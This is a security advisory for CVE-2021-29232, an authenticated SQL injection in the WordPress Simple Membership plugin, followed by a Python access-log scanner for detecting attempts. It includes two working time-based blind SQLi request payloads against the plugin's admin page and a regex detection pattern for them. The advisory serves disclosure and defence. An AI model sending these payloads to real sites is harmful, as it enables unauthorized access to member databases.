Simple Membership < 4.0.4 - Authenticated SQL Injections in GET Requests
Title | Published | Family
---|---|---
CVE-2021-29232 | 20 Apr 2022 19:48 | cve
Simple Membership < 4.0.4 - Authenticated SQL Injections | 5 Apr 2021 00:00 | wpvulndb
WordPress Simple Membership plugin <= 4.0.3 - Authenticated SQL Injection (SQLi) vulnerability | 5 Apr 2021 00:00 | patchstack
Source | Link |
---|---|
trustwave | www.trustwave.com/en-us/resources/security-resources/security-advisories/ |
Proof of concept (time-based blind SQL injection through the 's' search parameter of the plugin's admin page, sent with an authenticated admin session):

```http
GET /wp/wp-admin/admin.php?status=&membership_level=&s=hhhh%27%20OR%20SLEEP%281%29%20OR%20first_name%20LIKE%20%27%25i%0A&page=simple_wp_membership HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-admin/admin.php?page=simple_wp_membership
Connection: keep-alive
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1
```
In addition to the 's' parameter, the 'status' parameter is similarly vulnerable:
```http
GET /wp/wp-admin/admin.php?status=active%27%20AND%20SLEEP%288%29%20AND%20%27a%27%3D%27a&membership_level=&s=&page=simple_wp_membership
```
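Both requests above hit the same admin page, so a defender can spot exploitation attempts in web-server access logs by decoding the query string and checking only the two injectable parameters. The following is an added detection example, not part of the advisory or the plugin; the log lines, the `SQLI_RE` pattern and the function names are constructed here for illustration.

```python
# Added example: flag requests to the Simple Membership admin page whose
# 's' or 'status' parameters carry SQL-injection fragments. The log lines
# are constructed samples in Apache combined format, not real traffic.
import re
from urllib.parse import urlsplit, parse_qs

SAMPLE_LOG = r'''
10.0.0.5 - - [05/Apr/2021:10:00:01 +0000] "GET /wp/wp-admin/admin.php?page=simple_wp_membership&status=&membership_level=&s=john HTTP/1.1" 200 5123
10.0.0.5 - - [05/Apr/2021:10:00:09 +0000] "GET /wp/wp-admin/admin.php?status=&membership_level=&s=hhhh%27%20OR%20SLEEP%281%29%20OR%20first_name%20LIKE%20%27%25i%0A&page=simple_wp_membership HTTP/1.1" 200 5123
10.0.0.5 - - [05/Apr/2021:10:00:20 +0000] "GET /wp/wp-admin/admin.php?status=active%27%20AND%20SLEEP%288%29%20AND%20%27a%27%3D%27a&membership_level=&s=&page=simple_wp_membership HTTP/1.1" 200 5123
10.0.0.7 - - [05/Apr/2021:10:01:00 +0000] "GET /wp/wp-admin/admin.php?page=simple_wp_membership&status=active&s=o%27brien HTTP/1.1" 200 5123
'''

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Fragments that never belong in a member search term or a status filter
# (time-based functions, OR ... LIKE, and quote-balancing tail conditions).
SQLI_RE = re.compile(
    r"(sleep\s*\(|benchmark\s*\(|\bor\b.+\blike\b|'\s*(and|or)\s+'?\w+'?\s*=)",
    re.IGNORECASE | re.DOTALL)
WATCHED_PARAMS = ("s", "status")

def suspicious_params(target):
    """Return the watched parameters on the plugin page that carry SQLi fragments."""
    url = urlsplit(target)
    if not url.path.endswith("/wp-admin/admin.php"):
        return []
    # parse_qs percent-decodes values, so the raw %27 / %28 encoding is seen through.
    qs = parse_qs(url.query, keep_blank_values=True)
    if qs.get("page") != ["simple_wp_membership"]:
        return []
    return [p for p in WATCHED_PARAMS for v in qs.get(p, []) if SQLI_RE.search(v)]

def scan_log(text):
    """Return (client_ip, parameter) pairs for every flagged request in an access log."""
    hits = []
    for line in text.strip().splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for param in suspicious_params(m.group("target")):
            hits.append((line.split()[0], param))
    return hits

if __name__ == "__main__":
    for ip, param in scan_log(SAMPLE_LOG):
        print(f"{ip}: injection fragment in '{param}'")
```

A legitimate search such as `o'brien` passes because a lone quote is not matched; only the SQL constructs that follow the quote are.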